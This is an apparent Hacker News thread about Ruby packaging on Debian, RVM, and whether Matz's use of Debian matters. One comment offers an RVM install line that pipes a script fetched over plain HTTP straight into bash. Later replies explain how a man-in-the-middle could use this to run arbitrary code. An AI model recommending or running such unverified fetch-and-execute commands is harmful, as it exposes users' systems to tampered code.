
Matz: I use Debian, I have no Ruby problems. - steveklabnik
http://www.ruby-forum.com/topic/785744#971922
======
danieldk
It's great that manual compilation works for Matz. And his great work
notwithstanding, it has little to do with the general user.

As an occasional Ruby programmer, and frequent Ruby-based utility user, I do
not want to compile and install Ruby or Ruby modules myself. If we go down
that road, why don't we compile everything from Python to GStreamer ourselves
(since they all have modules/plugins/...)?

To the general user (as opposed to full-time Ruby programmer), Ruby and Ruby
modules are just dependencies to the application they want to use, and
installation should be automatic. One can only hope that the Ruby community
understands this, and makes it easy for distributors to package their
software.

~~~
kajecounterhack
Have you tried rvm?

    
    
      bash < <( curl http://rvm.beginrescueend.com/releases/rvm-install-head )
      rvm install 1.9.2
      rvm use 1.9.2 --default
      which ruby
    

EDIT thanks telemachos, add this to either zshrc (if you're using zsh) or
bash_profile or equivalent

    
    
      [[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"

~~~
joeyh
Are you seriously suggesting using a a package system that is bootstrapped by
downloading and running a shell script with no security protections
whatsoever?

Moreover, it's not just you giving a bad example, as the shell script then
clones a git repository, again with no protections whatsover (over http by
default to make it really easy to MITM attack), and runs code from _it_. So
this was written by people who just don't care, or don't understand security.
Not people I'd be trusting with package management on my system.

This kind of thing might have been acceptible, barely, before 1995. Since
then, we've developed package systems with gpg signed chains of trust.

~~~
steveklabnik
I think you're being _just a bit_ reactionary.

Besides if you git clone, literally _every commit_ is checksummed. I'm no
security expert, but I don't think MITM-ing a 'git clone' sounds 'really
easy.'

~~~
subway
No, you're clearly not a security expert. If you're doing a git clone over
HTTP, you can't even be certain you're talking to the right git repository.
Sure, each and every commit may be checksummed, but how exactly do you
anticipate knowing what the correct checksums are?

~~~
steveklabnik
Fair enough. Like I said, I don't know enough about this.

> how exactly do you anticipate knowing what the correct checksums are?

Well, because the repo you're cloning knows what they are... I wasn't thinking
about the repo itself being owned, but git's whole job is to make sure that
chunks of text get from one place to the other in an identical state, so...

~~~
vietor
The target repo itself isn't owned, but your connection is. The point is that
you only _think_ that you are talking to the correct repo, when in fact you
are cloning whatever git repository the attacker would like you to.

It's obviously a focused attack as are all MITM attacks, so you can assume the
attacker is familiar with the install script. So when the script then
continues and performs it's next action on the contents of the repository, you
will execute an arbitrary payload.

Edit: It wasn't clear to me that the problem had become apparent in the parent
post. Probably just pre-coffee thinking on my part, but hopefully this will
help clarify it for anyone else reading along who also missed it.

~~~
steveklabnik
Yes, when I said 'the remote repo', what I meant was 'the one that I see.

Thanks for the extra explanation, guys! Makes a lot of sense.

------
lylejohnson
Assuming this is a response to yesterday's news about Debian's Ruby
maintainer, I don't see how it's relevant. Matz is almost certainly compiling
his own Ruby (as many Rubyists do) and not using the Debian packages for Ruby.

~~~
steveklabnik
It's true. I mostly just thought that it was interesting that after reading
all that hubbub over the last few days, to pop open ruby-talk and see this...

At the same time, there is a certain amount of relevance: while lots of
Rubyists (including myself) talk a lot of shit on Debian, Debian is still the
only Linux that is (technically) supported by Ruby. It's this way because the
Hudson (or whatever, it's still early...) server is running Debian, and they
don't have another box or two... but still, I guess my point is that Debian is
important, no matter how frustrating their policies may seem at times.

------
fingerprinter
I'm seeing a trend in the comments re RVM and other suggestions.

There are essentially two issues at hand here and we would all do well to
remember the difference between the two.

1\. Ruby as a good citizen in a distro 2\. Ruby as a development tool for
programmers

#2 is mainly achieved via RVM for sure. I program both Ruby and Python and as
well as some JS and Erlang. I LOVE RVM for ruby/gem management and actually
prefer it to Python's virtualenv (just a preference! Don't bite my head off ;)
)

#1, however, is what we should really be talking about as it is what the
original debian maintainer was complaining about. Matz is more talking about
#2.

I use Ubuntu as my development and deployment platform. I could never imagine
if Python was not available, stable and usable as a base package on Ubuntu
without me having to do some RVM/Virtualenv incantation each time. Sure, there
could be a chef/puppet/script installation approach, but why? And for those
who think this is trivial, think about all the packages that are in fact
written in Python that are part of the desktop or base system. Python is
literally embedded in everything!

One of the greatest things about Debian/Ubuntu, and why I think it is the
premier development platform, are things like: sudo aptitude install build-
essential

All that being said, this is a very hard problem to generally solve. I would
hope that Ruby would be more Pythonic in the distro, but I don't see it being
a priority for Ruby folks anytime soon....

Side note: go look up the transition from Python2.6 to Python2.7 for upcoming
Ubuntu 11.04 to see what is involved in such a transition. It is non-trivial
to say the least but Debian/Ubuntu maintainers are doing a stellar job with
it...it is a complex issue and much care is needed...

And as another aside...anyone remember the Ubuntu rolling releases issue? At
is core with rolling releases was things like Python2.6 -> Python2.7
transition...not something you can easily achieve in true distro rolling
releases and again, just an example of why this is a complex problem and
things like RVM are not appropriate for discussion of #2 as it stands.

~~~
telemachos
I agree with much of what you say about the two different threads and
perspectives here (and elsewhere) whenever this argument comes up. However:

> And for those who think this is trivial, think about all the packages that
> are in fact written in Python that are part of the desktop or base system.
> Python is literally embedded in everything! [...then later...] All that
> being said, this is a very hard problem to generally solve. I would hope
> that Ruby would be more Pythonic in the distro, but I don't see it being a
> priority for Ruby folks anytime soon....

You say that Ruby should be more Pythonic and that this is not a priority for
"Ruby folks", but I'm not sure that's a fair way to characterize the distro
problem. In fact, from Ruby's point of view, Debian has a special pride of
place: it's the _only_ officially supported Linux distro (since testing is
done on Debian machines, I believe). For more on that see the discussion and
links in this thread: <http://news.ycombinator.com/item?id=1614618>
(tenderlove is Aaron Patterson, a Ruby core dev).

I would argue, as I say elsewhere in this thread, that the reason Python is so
well handled is precisely what you mention in the first bit I quote. _Because_
so much of the Gnome desktop is written in Python, perhaps Python gets special
treatment by the distro. That suggests that the distro needs to meet the
language devs at least part way, rather than that the language folks are the
only ones who need to change their attitude.

------
shimonamit
Matz compiles. He doesn't use Debian's packaging.

~~~
bad_user
He most certainly uses Debian's packaging for any dependencies he may need.

Or do you think he also compiles stuff like Readline, IConv, Zlib, OpenSSL? Or
stuff related to Ruby gems, like postgresql-server-8.4, in case he needs ruby-
pg ?

On other platforms even installing GCC is a painful process, when on
Debian/Ubuntu is as easy as:

    
    
          sudo aptitude install build-essential
    

And why would he need to compile his own Ruby for stuff unrelated to
developing the Ruby interpreter? Are you telling me that if he needs to do
some quick processing on some machine he absolutely needs HEAD?

~~~
shimonamit
The backdrop on this topic is the recent news of Debian's Ruby package
maintainer quitting, mostly due to issues he has with the Ruby core community
and the maintenance/release process.

This post by Matz was supposedly submitted to debunk the myth that "Ruby's not
for Debian", but it is entirely orthogonal to the issue at hand. Matz
undoubtedly compiles his Ruby, as most maintainers would do with their
projects, rather than install using Debian's package manager.

~~~
steveklabnik
If you look at the topic of the thread, it's to a user. The ruby-talk mailing
list is for general discussion, and the title of the thread is "Best Linux
Distro for Ruby?"

------
poink
I just don't get why this is supposedly a Ruby problem rather than a $LANG
problem, when Lucas Nussbaum's complaints about Ruby's packaging situation
(sans the whining about Japanese) apply equally well to every other language
you might want to install.

It's also pretty hilarious when a guy maintaining one of 50+ different
distributions of the same software cries about division of manpower upstream.

------
risotto
A tautology, no? He wouldn't use Debian if he did have problems.

I get neck deep in large Ruby deployments and the issue is clear to me. Ruby
is evolving at a breakneck speed but as a result has very poor release
management.

My solution:

Use Bash and Python for systems programming. Both are stable and simple well
integrated into Ubuntu and frankly much better for the task anyway. Oh no, now
I can't use Chef! (sarcasm)

Use Ruby for web development, with RVM and bundler. This is a vast universe of
bleeding edge web programming toys.

I struggle to see a real problem here...

~~~
jamesbritt
" Ruby is evolving at a breakneck speed but as a result has very poor release
management."

Just what is changing so fast in Ruby? Is 1.9.2 so much different from 1.9.1?
Has anything changed in 1.8.7?

~~~
steveklabnik
1.9.1 -> 1.9.2 changed the way threads were handled, which was pretty huge.
And good for Ruby.

~~~
jamesbritt
Ah, OK, thanks.

Still, does this count as "breakneck" change?

I'm not seeing it, but maybe I'm too close to the subject matter.

------
buster
Who is matz? Everyone seems to know..

~~~
fingerprinter
The guy who wrote Ruby - <http://en.wikipedia.org/wiki/Yukihiro_Matsumoto>

~~~
buster
Ahhh, ok. Somehow the only japanese i know is the creator of Mario :p Thanks,
anyway.

I can't imagine, i'm the only one, who didn't know.

